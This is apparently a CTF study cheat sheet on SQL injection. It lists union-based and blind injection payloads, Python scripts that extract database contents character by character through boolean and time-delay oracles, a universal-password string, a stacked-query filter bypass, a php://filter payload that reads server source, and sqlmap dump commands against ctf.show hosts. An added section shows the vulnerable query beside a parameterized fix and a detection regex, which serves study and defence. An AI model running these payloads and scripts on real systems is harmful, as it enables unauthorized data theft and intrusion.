HTTP & SQL Injection
HTTP request methods
- post
- get
- put
- head
HTTP headers
- Referer:
SQL blind injection
1. When query results are returned
- Get databases
The id value in front must be one that returns no rows; the single quote closes the single quote that precedes it in the statement (sometimes a double quote is needed instead, which you find out by testing); the trailing --+ is a SQL comment that comments out the rest of the statement.
Original backend statement: select * from table where id='<the part of the page URL after id=>'
id=-1' union select 1,2,...,group_concat(schema_name) from information_schema.schemata --+
- Get tables
id=-1' union select 1,2,...,group_concat(table_name) from information_schema.tables where table_schema=[database()]
- Get columns
select 1,2,...,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
- Get values
select 1,2,...,group_concat(username,password) from users
2. When only True or False is returned
- {i} selects the i-th character of the query result; mid is the midpoint of a binary search, which speeds up the scan; the if function returns 1 when the condition is True and 0 otherwise. Then iterate over the positions and test each one.
if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23
- Reference code
```python
import requests

if __name__ == "__main__":
    url = 'http://4c09e513-4b0f-4a02-b588-f348a25c0448.challenge.ctf.show:8080/?id=1%27 and '
    result = ''
    i = 0
    while True:
        i = i + 1
        # Binary search over the printable ASCII range for the i-th character
        low = 32
        high = 127
        while low < high:
            mid = (low + high) // 2
            #payload=f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23'
            #payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=%27ctfshow%27),{i},1))>{mid},1,0)%23'
            #payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=%27ctfshow%27 and table_name=%27flagjugg%27),{i},1))>{mid},1,0)%23'
            payload = f'if(ascii(substr((select group_concat(flag423) from ctfshow.flagjugg),{i},1))>{mid},1,0)%23'
            r = requests.get(url=url + payload)
            # The page text tells True from False: True means the character is > mid
            if 'You are in' in r.text:
                low = mid + 1
            else:
                high = mid
        if low != 32:
            result = result + chr(low)
        else:
            # low stayed at 32: no character at this position, the result is complete
            break
    print(result)
```
3. Time-based blind injection
- Judge by observing the delay of the request.
xxx' and if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.5),0)%23'
- Reference script
```python
import requests

if __name__ == '__main__':
    url = 'http://cbeb409a-91dd-4b51-a03e-0295776e36a5.challenge.ctf.show:8080/?id=1%27 and '
    result = ''
    i = 0
    while True:
        i = i + 1
        # Binary search over the printable ASCII range for the i-th character
        low = 32
        high = 127
        while low < high:
            mid = (low + high) // 2
            payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.5),0)%23'
            #payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.5),0)%23'
            #payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagug"),{i},1))>{mid},sleep(0.5),0)%23'
            #payload = f'if(ascii(substr((select group_concat(flag4a23) from ctfshow.flagug),{i},1))>{mid},sleep(0.5),0)%23'
            # print(payload)
            try:
                # The response must arrive within the timeout (0.5 s) for the statement below to run;
                # if it has not arrived by then, the except branch runs instead.
                r = requests.get(url=url + payload, timeout=0.5)
                high = mid
            except requests.exceptions.Timeout:
                # The request timed out, so sleep() fired: the character is > mid
                low = mid + 1
        if low != 32:
            result += chr(low)
            #print(result)
        else:
            break
    print(result)
```
4. Universal password
`1' or '1'='1`
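Added example, not code from the original notes: the backend statement `select * from table where id='...'` from section 1 rebuilt on an in-memory SQLite table with constructed rows, beside the parameterized form, both run against the universal password above, plus a URL-decoding check that flags the payload shapes listed in these notes. The table, rows, function names and regex are assumptions; SQLite has no information_schema or sleep(), so only the universal password is exercised against the database.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample rows (not from the notes).
ROWS = [(1, "alice", "a-secret"), (2, "bob", "b-secret"), (3, "carol", "c-secret")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.executemany("insert into users values (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    # The backend pattern from the notes: the URL value is pasted into the SQL text,
    # so a quote in the input closes the literal and the rest is parsed as SQL.
    return conn.execute(f"select * from users where id='{user_id}'").fetchall()


def lookup_parameterized(conn, user_id):
    # Bound parameter: the driver passes the value as data, so quotes and
    # comment markers inside it never reach the SQL parser as syntax.
    return conn.execute("select * from users where id=?", (user_id,)).fetchall()


# Heuristic matching the payload shapes listed in these notes (assumed pattern set).
SUSPICIOUS = re.compile(
    r"union\s+select|information_schema|sleep\(|'\s*or\s*'|--\s|#|\border\s+by\s+\d", re.I)


def flags_payload(raw_query_value):
    # URL-decode first so %27 (') and %23 (#) are inspected as the characters they become.
    return bool(SUSPICIOUS.search(unquote_plus(raw_query_value)))


def demo():
    conn = make_db()
    payload = "1' or '1'='1"                   # the universal password from section 4
    vuln = lookup_vulnerable(conn, payload)    # id='1' or '1'='1': every row comes back
    safe = lookup_parameterized(conn, payload) # the whole string is compared to id: no row
    return len(vuln), len(safe)
```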
5. Common SQL comment symbols
#
%23
--+
--%20
6. Common injection tricks
id=-1' order by 1
【Keep increasing the order by value to find the number of columns in the current query】
id=-1';use supersqli;show tables;desc 1919810931114514;set @sql=concat('s','elect flag from 1919810931114514');PREPARE stmt1 FROM @sql;EXECUTE stmt1;%23
【A way to bypass filters on select and similar keywords】
?file=php://filter/read=convert.base64-encode/resource=flag.php
【Read a server-side file; base64-encoding it avoids the comments disappearing after PHP runs the file, so the source is retrieved; the four kinds of filters are string, conversion, compression and encryption filters】
r = requests.get('http://cac4fc17-efcd-4248-9cbc-16b9428bdfe5.node4.buuoj.cn:81/action.php',allow_redirects=False)
【allow_redirects=False stops the 302 redirect from being followed】
sqlmap
Steps:
- List databases
sqlmap -u http://4221a56b-a478-4b11-b1ab-5ddb7c20f7fd.challenge.ctf.show:8080/?id=1 --dbs
- List tables
sqlmap -u http://4221a56b-a478-4b11-b1ab-5ddb7c20f7fd.challenge.ctf.show:8080/?id=1 --tables -D ctfshow
- List columns and dump the data
sqlmap -u http://4221a56b-a478-4b11-b1ab-5ddb7c20f7fd.challenge.ctf.show:8080/?id=1 -D ctfshow -T flagug --columns --dump
Special cases
- POST request (add the parameter --data "id=1")
sqlmap -u http://test.com --data "id=1"
- Using a Burp Suite capture (add the parameter -r), where a.txt is the captured request and -p id specifies the id field as the injection parameter (optional).
sqlmap -r a.txt [-p id]